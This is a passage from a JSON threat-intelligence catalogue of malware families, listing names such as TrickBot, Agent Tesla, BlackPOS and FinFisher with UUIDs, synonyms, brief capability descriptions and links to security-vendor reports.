"https://threatpost.com/handbrake-for-mac-compromised-with-proton-spyware/125518/",
"https://objective-see.com/blog/blog_0x1F.html",
"https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/",
"https://www.hackread.com/hackers-selling-undetectable-proton-mac-malware/",
"https://www.cybersixgill.com/wp-content/uploads/2017/02/02072017%20-%20Proton%20-%20A%20New%20MAC%20OS%20RAT%20-%20Sixgill%20Threat%20Report.pdf"
]
}
},
{
"uuid": "b8e87440-6005-459c-9a20-35516ce2fa5b",
"value": "Lazarus",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securingtomorrow.mcafee.com/mcafee-labs/android-malware-appears-linked-to-lazarus-cybercrime-group/"
]
}
},
{
"uuid": "bd29030e-d440-4842-bc2a-c173ed938da4",
"value": "Spedear",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets"
]
}
},
{
"uuid": "9715c6bc-4b1e-49a2-b1d8-db4f4c4f042c",
"value": "FireMalv",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf"
]
}
},
{
"uuid": "af6e89ec-0adb-4ce6-b4e6-610827e722ea",
"value": "Jasus",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf"
]
}
},
{
"uuid": "70059ec2-9315-4af7-b65b-2ec35676a7bb",
"value": "Pwnet",
"description": "Cryptocurrency miner that was distributed masquerading as a Counter-Strike: Global Offensive hack.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://sentinelone.com/blog/osx-pwnet-a-csgo-hack-and-sneaky-miner/"
]
}
},
{
"uuid": "c824813c-9c79-4917-829a-af72529e8329",
"value": "TrickBot",
"description": "A financial Trojan believed to be a derivative of Dyre: the bot uses very similar code, web injects, and operational tacitcs. Has multiple modules including VNC and Socks5 Proxy. Uses SSL for C2 communication.",
"meta": {
"synonyms": [
"Trickster",
"TheTrick",
"TrickLoader"
],
"type": [],
"refs": [
"https://blog.malwarebytes.com/threat-analysis/2017/08/trickbot-comes-with-new-tricks-attacking-outlook-and-browsing-data/",
"https://f5.com/labs/articles/threat-intelligence/malware/little-trickbot-growing-up-new-campaign-24412",
"http://www.vkremez.com/2017/12/lets-learn-introducing-new-trickbot.html",
"https://www.fidelissecurity.com/threatgeek/2016/10/trickbot-we-missed-you-dyre",
"https://www.flashpoint-intel.com/blog/trickbot-account-checking-hybrid-attack-model/",
"https://blog.malwarebytes.com/threat-analysis/2016/10/trick-bot-dyrezas-successor/",
"https://www.youtube.com/watch?v=KMcSAlS9zGE",
"https://www.arbornetworks.com/blog/asert/trickbot-banker-insights/",
"https://www.trustwave.com/Resources/SpiderLabs-Blog/Tale-of-the-Two-Payloads-%E2%80%93-TrickBot-and-Nitol/",
"http://www.vkremez.com/2018/04/lets-learn-trickbot-implements-network.html",
"https://securityintelligence.com/trickbot-takes-to-latin-america-continues-to-expand-its-global-reach/",
"https://qmemcpy.io/post/reverse-engineering-malware-trickbot-part-2-loader",
"https://securityintelligence.com/trickbots-cryptocurrency-hunger-tricking-the-bitcoin-out-of-wallets/",
"https://blog.fraudwatchinternational.com/malware/trickbot-malware-works",
"https://www.blueliv.com/research/trickbot-banking-trojan-using-eflags-as-an-anti-hook-technique/",
"https://f5.com/labs/articles/threat-intelligence/malware/trickbot-expands-global-targets-beyond-banks-and-payment-processors-to-crms",
"https://blogs.forcepoint.com/security-labs/trickbot-spread-necurs-botnet-adds-nordic-countries-its-targets",
"https://github.com/JR0driguezB/malware_configs/tree/master/TrickBot",
"https://escinsecurity.blogspot.de/2018/01/weekly-trickbot-analysis-end-of-wc-22.html",
"https://www.webroot.com/blog/2018/03/21/trickbot-banking-trojan-adapts-new-module/",
"https://www.securityartwork.es/wp-content/uploads/2017/06/Informe_Evoluci%C3%B3n_Trickbot.pdf",
"http://www.malware-traffic-analysis.net/2018/02/01/",
"http://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot",
"http://www.vkremez.com/2017/11/lets-learn-trickbot-socks5-backconnect.html",
"https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/",
"http://www.pwc.co.uk/issues/cyber-security-data-privacy/research/trickbots-bag-of-tricks.html",
"https://qmemcpy.io/post/reverse-engineering-malware-trickbot-part-3-core",
"https://www.ringzerolabs.com/2017/07/trickbot-banking-trojan-doc00039217doc.html",
"https://www.youtube.com/watch?v=EdchPEHnohw",
"https://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html",
"https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html",
"https://www.youtube.com/watch?v=lTywPmZEU1A",
"https://qmemcpy.github.io/post/reverse-engineering-malware-trickbot-part-1-packer",
"https://www.botconf.eu/wp-content/uploads/2016/11/2016-LT09-TrickBot-Adams.pdf",
"https://www.flashpoint-intel.com/blog/new-version-trickbot-adds-worm-propagation-module/"
]
}
},
{
"uuid": "e248d80d-de8e-45de-b6d0-3740e5b34573",
"value": "ATI-Agent",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/"
]
}
},
{
"uuid": "b6b187d0-e19f-489a-91c0-7c94519555f6",
"value": "c0d0so0",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "5b75db42-b8f2-4e52-81d3-f329e49e1af2",
"value": "Manifestus",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/struppigel/status/811587154983981056"
]
}
},
{
"uuid": "70459959-5a20-482e-b714-2733f5ff310e",
"value": "KLRD",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks",
"https://www.morphick.com/resources/news/klrd-keylogger"
]
}
},
{
"uuid": "7a38c552-0e1a-4980-8d62-1aa38617efab",
"value": "SMSspy",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "19d89300-ff97-4281-ac42-76542e744092",
"value": "Helminth",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html",
"https://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/",
"http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/"
]
}
},
{
"uuid": "9803b201-28e5-40c5-b661-c1a191388072",
"value": "ScreenLocker",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/struppigel/status/791535679905927168"
]
}
},
{
"uuid": "8098d303-cb5f-4eff-b62e-96bb5ef4329f",
"value": "Loda",
"description": "Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as “Trojan.Nymeria”, although the connection is not well-documented.",
"meta": {
"synonyms": [
"Nymeria"
],
"type": [],
"refs": [
"https://www.proofpoint.com/us/threat-insight/post/introducing-loda-malware",
"https://zerophagemalware.com/2018/01/23/maldoc-rtf-drop-loda-logger/"
]
}
},
{
"uuid": "31d2ce1f-44bf-4738-a41d-ddb43466cd82",
"value": "Roaming Mantis",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/roaming-mantis-dabbles-in-mining-and-phishing-multilingually/85607/",
"https://securelist.com/roaming-mantis-uses-dns-hijacking-to-infect-android-smartphones/85178/"
]
}
},
{
"uuid": "69a3e0ed-1727-4a9c-ae21-1e32322ede93",
"value": "Buzus",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "00764634-4a21-4c5c-8b1f-fb294c9bdd3f",
"value": "Prikorma",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.welivesecurity.com/wp-content/uploads/2016/05/Operation-Groundbait.pdf"
]
}
},
{
"uuid": "0404cb3e-1390-4010-a368-80ee585ddd59",
"value": "Dented",
"description": "Dented is a banking bot written in C. It supports IE, Firefox, Chrome, Opera and Edge and comes with a simple POS grabber. Due to its modularity, reverse socks 5, tor and vnc can be added.",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "1dc53eb8-ffae-4823-9c11-3c01514398b9",
"value": "Cuegoe",
"description": "",
"meta": {
"synonyms": [
"Windshield?"
],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html",
"http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3451",
"http://blog.malwaremustdie.org/2014/08/another-country-sponsored-malware.html",
"https://www.eff.org/deeplinks/2014/01/vietnamese-malware-gets-personal"
]
}
},
{
"uuid": "e4e15ab4-9ba6-444a-b154-2854757e792e",
"value": "CMSTAR",
"description": "",
"meta": {
"synonyms": [
"meciv"
],
"type": [],
"refs": [
"https://twitter.com/ClearskySec/status/963829930776723461",
"https://www.votiro.com/single-post/2018/02/13/New-campaign-targeting-Ukrainians-holds-secrets-in-documents-properties",
"https://researchcenter.paloaltonetworks.com/2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan",
"https://researchcenter.paloaltonetworks.com/2016/03/digital-quartermaster-scenario-demonstrated-in-attacks-against-the-mongolian-government/"
]
}
},
{
"uuid": "9a724a1d-7eb1-4e2b-8cc3-e1b41e8b5cff",
"value": "Machete",
"description": "",
"meta": {
"synonyms": [
"El Machete"
],
"type": [],
"refs": [
"https://securelist.com/el-machete/66108/",
"https://www.cylance.com/en_us/blog/el-machete-malware-attacks-cut-through-latam.html",
"https://medium.com/@verovaleros/el-machete-what-do-we-know-about-the-apt-targeting-latin-america-be7d11e690e6"
]
}
},
{
"uuid": "6eee9bf9-ffce-4c88-a5ad-9d80f6fc727c",
"value": "ChChes",
"description": "",
"meta": {
"synonyms": [
"Ham Backdoor"
],
"type": [],
"refs": [
"https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html",
"https://www.jpcert.or.jp/magazine/acreport-ChChes_ps1.html",
"http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/",
"https://www.jpcert.or.jp/magazine/acreport-ChChes.html",
"https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf"
]
}
},
{
"uuid": "1e62fc1f-daa7-416f-9159-099798bb862c",
"value": "BlackPOS",
"description": "BlackPOS infects computers running on Windows that have credit card readers connected to them and are part of a POS system. POS system computers can be easily infected if they do not have the most up to date operating systems and antivirus programs to prevent security breaches or if the computer database systems have weak administration login credentials. ",
"meta": {
"synonyms": [
"Reedum",
"POSWDS",
"Kaptoxa"
],
"type": [],
"refs": [
"https://blog.trendmicro.com/trendlabs-security-intelligence/new-blackpos-malware-emerges-in-the-wild-targets-retail-accounts/"
]
}
},
{
"uuid": "c28e9055-b656-4b7a-aa91-fe478a83fe4c",
"value": "Tyupkin",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.lastline.com/labsblog/tyupkin-atm-malware/"
]
}
},
{
"uuid": "f44e6d03-54c0-47af-b228-0040299c349c",
"value": "Dexter",
"description": "",
"meta": {
"synonyms": [
"LusyPOS"
],
"type": [],
"refs": [
"https://securitykitten.github.io/2014/12/01/lusypos-and-tor.html",
"https://volatility-labs.blogspot.com/2012/12/unpacking-dexter-pos-memory-dump.html",
"https://www.trustwave.com/Resources/SpiderLabs-Blog/The-Dexter-Malware--Getting-Your-Hands-Dirty/",
"http://contagiodump.blogspot.com/2012/12/dexter-pos-infostealer-samples-and.html",
"https://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATION/25000/PD25658/en_US/McAfee_Labs_Threat_Advisory-LusyPOS.pdf",
"https://blog.fortinet.com/2014/03/10/how-dexter-steals-credit-card-information",
"https://blog.trendmicro.com/trendlabs-security-intelligence/infostealer-dexter-targets-checkout-systems/"
]
}
},
{
"uuid": "7b9a9ea0-04d2-42ef-b72f-9d6476b9e0d0",
"value": "Spamtorte",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://cyber.verint.com/resource/spamtorte-v2-investigating-a-multi-layered-spam-botnet/"
]
}
},
{
"uuid": "8420653b-1412-45a1-9a2d-6aa9b9eaf906",
"value": "Swift?",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/blog/sas/77908/lazarus-under-the-hood/"
]
}
},
{
"uuid": "7007b268-f6f4-4a01-9184-fc2334461c38",
"value": "SysScan",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "22755fda-497e-4ef0-823e-5cb6d8701420",
"value": "InvisiMole",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/"
]
}
},
{
"uuid": "3cec2c3c-1669-40cf-8612-eb826f7d2c98",
"value": "Excalibur",
"description": "",
"meta": {
"synonyms": [
"Sabresac",
"Saber"
],
"type": [],
"refs": [
"https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies"
]
}
},
{
"uuid": "06f63e6b-d177-4e21-b432-e3a219bc0965",
"value": "r980",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://otx.alienvault.com/pulse/57976b52b900fe01376feb01/"
]
}
},
{
"uuid": "a3370013-6c47-422e-a4d4-1b86ee71e5e5",
"value": "Miancha",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.contextis.com//documents/30/TA10009_20140127_-_CTI_Threat_Advisory_-_The_Monju_Incident1.pdf"
]
}
},
{
"uuid": "26aa3c43-5049-4a2e-bec1-9709b31a1a26",
"value": "soraya",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.arbornetworks.com/blog/asert/the-best-of-both-worlds-soraya/"
]
}
},
{
"uuid": "33f97c52-0bcd-43f4-88bb-99e7da9f49ae",
"value": "XP PrivEsc (CVE-2014-4076)",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender_In-depth_analysis_of_APT28%E2%80%93The_Political_Cyber-Espionage.pdf"
]
}
},
{
"uuid": "e46262cd-961f-4c7d-8976-0d35a066ab83",
"value": "Abbath Banker",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "10d0115a-00b4-414e-972b-8320a2bb873c",
"value": "DoubleLocker",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.welivesecurity.com/2017/10/13/doublelocker-innovative-android-malware/"
]
}
},
{
"uuid": "41bf8f3e-bb6a-445d-bb74-d08aae61a94b",
"value": "Hide and Seek",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://labs.bitdefender.com/2018/05/hide-and-seek-iot-botnet-resurfaces-with-new-tricks-persistence/",
"https://labs.bitdefender.com/2018/01/new-hide-n-seek-iot-botnet-using-custom-built-peer-to-peer-communication-spotted-in-the-wild/"
]
}
},
{
"uuid": "cad83c5e-2081-4ab4-81c7-32cfc16eae66",
"value": "CadelSpy",
"description": "",
"meta": {
"synonyms": [
"Cadelle"
],
"type": [],
"refs": [
"http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf"
]
}
},
{
"uuid": "e3065e43-503b-4496-921b-7601dd3d6abd",
"value": "Auriga",
"description": "",
"meta": {
"synonyms": [
"Riodrv"
],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "3521faaa-1136-4e50-9fe2-3f33359e8b1d",
"value": "DarkMegi",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://stopmalvertising.com/rootkits/analysis-of-darkmegi-aka-npcdark.html",
"http://contagiodump.blogspot.com/2012/04/this-is-darkmegie-rootkit-sample-kindly.html"
]
}
},
{
"uuid": "28c13455-7f95-40a5-9568-1e8732503507",
"value": "KeyBoy",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/",
"https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/the-keyboys-are-back-in-town.html"
]
}
},
{
"uuid": "a492a3e0-13cb-4b7d-93c1-027e7e69b44d",
"value": "AbaddonPOS",
"description": "",
"meta": {
"synonyms": [
"PinkKite"
],
"type": [],
"refs": [
"https://threatpost.com/new-pos-malware-pinkkite-takes-flight/130428/",
"https://www.proofpoint.com/us/threat-insight/post/AbaddonPOS-A-New-Point-Of-Sale-Threat-Linked-To-Vawtrak"
]
}
},
{
"uuid": "f691663a-b360-4c0d-a4ee-e9203139c38e",
"value": "Marcher",
"description": "",
"meta": {
"synonyms": [
"ExoBot"
],
"type": [],
"refs": [
"https://www.zscaler.de/blogs/research/android-marcher-continuously-evolving-mobile-malware",
"https://www.clientsidedetection.com/marcher.html",
"https://www.clientsidedetection.com/exobot_v2_update___staying_ahead_of_the_competition.html"
]
}
},
{
"uuid": "0bc03bfa-1439-4162-bb33-ec9f8f952ee5",
"value": "NetC",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf"
]
}
},
{
"uuid": "1482ffff-47a8-46da-8f47-d363c9d86c0e",
"value": "Rockloader",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.proofpoint.com/us/threat-insight/post/Locky-Ransomware-Cybercriminals-Introduce-New-RockLoader-Malware"
]
}
},
{
"uuid": "0caf0292-b01a-4439-b56f-c75b71900bc0",
"value": "Lazarus",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.bleepingcomputer.com/news/security/polish-banks-infected-with-malware-hosted-on-their-own-governments-site/",
"https://twitter.com/PhysicalDrive0/status/828915536268492800",
"http://baesystemsai.blogspot.de/2016/05/cyber-heist-attribution.html",
"https://baesystemsai.blogspot.com/2017/02/lazarus-watering-hole-attacks.html"
]
}
},
{
"uuid": "c346faf0-9eb4-4f8a-8547-30e6641b8972",
"value": "KrDownloader",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.fidelissecurity.com/threatgeek/2017/05/blackmoon-rising-banking-trojan-back-new-framework"
]
}
},
{
"uuid": "74360d1e-8f85-44d1-8ce7-e76afb652142",
"value": "CpuMeaner",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.sentinelone.com/blog/osx-cpumeaner-miner-trojan-software-pirates/"
]
}
},
{
"uuid": "3d6c3ed5-804d-4d0b-8a01-68bc54ae8c58",
"value": "Adylkuzz",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.proofpoint.com/us/threat-insight/post/adylkuzz-cryptocurrency-mining-malware-spreading-for-weeks-via-eternalblue-doublepulsar"
]
}
},
{
"uuid": "99d83ee8-6870-4af2-a3c8-cf86baff7cb3",
"value": "TDTESS",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.clearskysec.com/tulip/"
]
}
},
{
"uuid": "b933634f-81d0-41ef-bf2f-ea646fc9e59c",
"value": "TinyZbot",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf"
]
}
},
{
"uuid": "fb75a753-24ba-4b58-b7ed-2e39b0c68c65",
"value": "Bateleur",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscript-backdoor"
]
}
},
{
"uuid": "9e5d83a8-1181-43fe-a77f-28c8c75ffbd0",
"value": "Satori",
"description": "Satori is a variation of elf.mirai which was first detected around 2017-11-27 by 360 Netlab. It uses exploit to exhibit worm-like behaviour to spread over ports 37215 and 52869 (CVE-2014-8361).",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.netlab.360.com/warning-satori-a-new-mirai-variant-is-spreading-in-worm-style-on-port-37215-and-52869-en/",
"https://www.arbornetworks.com/blog/asert/the-arc-of-satori/",
"http://blog.netlab.360.com/art-of-steal-satori-variant-is-robbing-eth-bitcoin-by-replacing-wallet-address-en/",
"https://blog.radware.com/security/botnets/2018/02/new-satori-botnet-variant-enslaves-thousands-dasan-wifi-routers/",
"http://www.eweek.com/security/collaborative-takedown-kills-iot-worm-satori"
]
}
},
{
"uuid": "5af4838f-1b4d-4f0b-bd27-50ef532e84f7",
"value": "Urausy",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "13b0d9ff-0be0-4539-8c86-dfca7a0e79f6",
"value": "ManItsMe",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "6a5bd819-5fbc-437b-92c4-ce0dfb5c67f8",
"value": "BlackRevolution",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.arbornetworks.com/blog/asert/the-revolution-will-be-written-in-delphi/"
]
}
},
{
"uuid": "64b34624-37de-4c51-8856-e721e31e67db",
"value": "Mokes",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/blog/research/75990/the-missing-piece-sophisticated-os-x-backdoor-discovered/",
"https://objective-see.com/blog/blog_0x16.html"
]
}
},
{
"uuid": "bbbf4786-1aba-40ac-8ad7-c9d8c66197a8",
"value": "tDiscoverer",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf"
]
}
},
{
"uuid": "41bfc8ad-ce2c-4ede-aa54-b3240a5cc8ca",
"value": "Project Alice",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.trendmicro.com/trendlabs-security-intelligence/alice-lightweight-compact-no-nonsense-atm-malware/"
]
}
},
{
"uuid": "6e94186c-987e-43da-be2d-9b44f254c8b9",
"value": "AlphaNC",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group"
]
}
},
{
"uuid": "f82f8d2c-695e-461a-bd4f-a7dc58531063",
"value": "Grateful POS",
"description": "POS malware targets systems that run physical point-of-sale device and operates by inspecting the process memory for data that matches the structure of credit card data (Track1 and Track2 data), such as the account number, expiration date, and other information stored on a cards magnetic stripe. After the cards are first scanned, the personal account number (PAN) and accompanying data sit in the point-of-sale systems memory unencrypted while the system determines where to send it for authorization. \r\nMasked as the LogMein software, the GratefulPOS malware appears to have emerged during the fall 2017 shopping season with low detection ratio according to some of the earliest detections displayed on VirusTotal. The first sample was upload in November 2017. Additionally, this malware appears to be related to the Framework POS malware, which was linked to some of the high-profile merchant breaches in the past.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.vkremez.com/2017/12/lets-learn-reversing-grateful-point-of.html",
"https://community.rsa.com/community/products/netwitness/blog/2017/12/08/gratefulpos-credit-card-stealing-malware-just-in-time-for-the-shopping-season"
]
}
},
{
"uuid": "f982fa2d-f78f-4fe1-a86d-d10471a3ebcf",
"value": "Konni",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html",
"https://blog.fortinet.com/2017/08/15/a-quick-look-at-a-new-konni-rat-variant",
"https://vallejo.cc/2017/07/08/analysis-of-new-variant-of-konni-rat/",
"http://blog.talosintelligence.com/2017/07/konni-references-north-korean-missile-capabilities.html"
]
}
},
{
"uuid": "db3dcfd1-79d2-4c91-898f-5f2463d7c417",
"value": "Rootnik",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.fortinet.com/2017/01/24/deep-analysis-of-android-rootnik-malware-using-advanced-anti-debug-and-anti-hook-part-i-debugging-in-the-scope-of-native-layer",
"https://blog.fortinet.com/2017/01/26/deep-analysis-of-android-rootnik-malware-using-advanced-anti-debug-and-anti-hook-part-ii-analysis-of-the-scope-of-java"
]
}
},
{
"uuid": "afb6a7cc-4185-4f19-8ad4-45dcbb76e544",
"value": "Unidentified APK 002",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "b88e29cf-79d9-42bc-b369-0383b5e04380",
"value": "Agent Tesla",
"description": "A .NET based keylogger and RAT readily available to actors. Logs keystrokes and the host's clipboard and beacons this information back to the C2.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2017/09/unit42-analyzing-various-layers-agentteslas-packing/",
"https://malwarebreakdown.com/2018/01/11/malspam-entitled-invoice-attched-for-your-reference-delivers-agent-tesla-keylogger/",
"https://www.zscaler.com/blogs/research/agent-tesla-keylogger-delivered-using-cybersquatting",
"https://blog.fortinet.com/2017/06/28/in-depth-analysis-of-net-malware-javaupdtr",
"https://thisissecurity.stormshield.com/2018/01/12/agent-tesla-campaign/",
"https://blogs.forcepoint.com/security-labs/part-two-camouflage-netting"
]
}
},
{
"uuid": "541b64bc-87ec-4cc2-aaee-329355987853",
"value": "FinFisher RAT",
"description": "",
"meta": {
"synonyms": [
"FinSpy"
],
"type": [],
"refs": [
"https://www.welivesecurity.com/2017/09/21/new-finfisher-surveillance-campaigns/",
"https://artemonsecurity.blogspot.de/2017/01/finfisher-rootkit-analysis.html",
"https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html",
"https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/",
"https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf",
"http://www.msreverseengineering.com/blog/2018/1/23/a-walk-through-tutorial-with-code-on-statically-unpacking-the-finspy-vm-part-one-x86-deobfuscation",
"https://cloudblogs.microsoft.com/microsoftsecure/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/"
]
}
},
{
"uuid": "bb07e153-2e51-4ce1-97a3-4ec8a936e625",
"value": "Heloag",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/heloag-has-rather-no-friends-just-a-master/29693/",
"https://www.arbornetworks.com/blog/asert/trojan-heloag-downloader-analysis/"
]
}
},
{
"uuid": "d91c4184-608e-47b1-b746-0e98587e2455",
"value": "Ploutus ATM",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2017/01/new_ploutus_variant.html",
"http://antonioparata.blogspot.co.uk/2018/02/analyzing-nasty-net-protection-of.html"
]
}
},
{
"uuid": "32fa6c53-b4fc-47f8-894c-1ea74180e02f",
"value": "Cryakl",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.ru/shifrovalshhik-cryakl-ili-fantomas-razbushevalsya/24070/",
"https://www.v3.co.uk/v3-uk/news/3026414/belgian-police-release-decryption-keys-for-cryakl-ransomware",
"https://hackmag.com/security/ransomware-russian-style/",
"https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Cryakl-B/detailed-analysis.aspx"
]
}
},
{
"uuid": "1248cdf7-4180-4098-b1d0-389aa523a0ed",
"value": "DMA Locker",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.malwarebytes.com/threat-analysis/2016/02/dma-locker-strikes-back/",
"https://blog.malwarebytes.com/threat-analysis/2016/02/dma-locker-a-new-ransomware-but-no-reason-to-panic/",
"https://blog.malwarebytes.com/threat-analysis/2016/05/dma-locker-4-0-known-ransomware-preparing-for-a-massive-distribution/"
]
}
},
{
"uuid": "d24882f9-8645-4f6a-8a86-2f85daaad685",
"value": "Computrace",
"description": "",
"meta": {
"synonyms": [
"lojack"
],
"type": [],
"refs": [
"https://www.lastline.com/labsblog/apt28-rollercoaster-the-lowdown-on-hijacked-lojack/",
"https://bartblaze.blogspot.de/2014/11/thoughts-on-absolute-computrace.html",
"https://asert.arbornetworks.com/lojack-becomes-a-double-agent/",
"https://www.absolute.com/en/resources/faq/absolute-response-to-arbor-lojack-research"
]
}
},
{
"uuid": "d9c14095-8885-406c-b56b-06f3a1a88c1c",
"value": "KasperAgent",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://researchcenter.paloaltonetworks.com/2017/04/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/",
"https://www.threatconnect.com/blog/kasperagent-malware-campaign/"
]
}
},
{
"uuid": "59b5697a-5154-4c08-87f8-c71b0e8425fc",
"value": "Chir",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "ae914b9a-67a2-425d-bef0-3a9624a207ba",
"value": "FindPOS",
"description": "",
"meta": {
"synonyms": [
"Poseidon"
],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2015/03/findpos-new-pos-malware-family-discovered/",
"https://blogs.cisco.com/security/talos/poseidon"
]
}
},
{
"uuid": "52c1518d-175c-4b39-bc7c-353d2ddf382e",
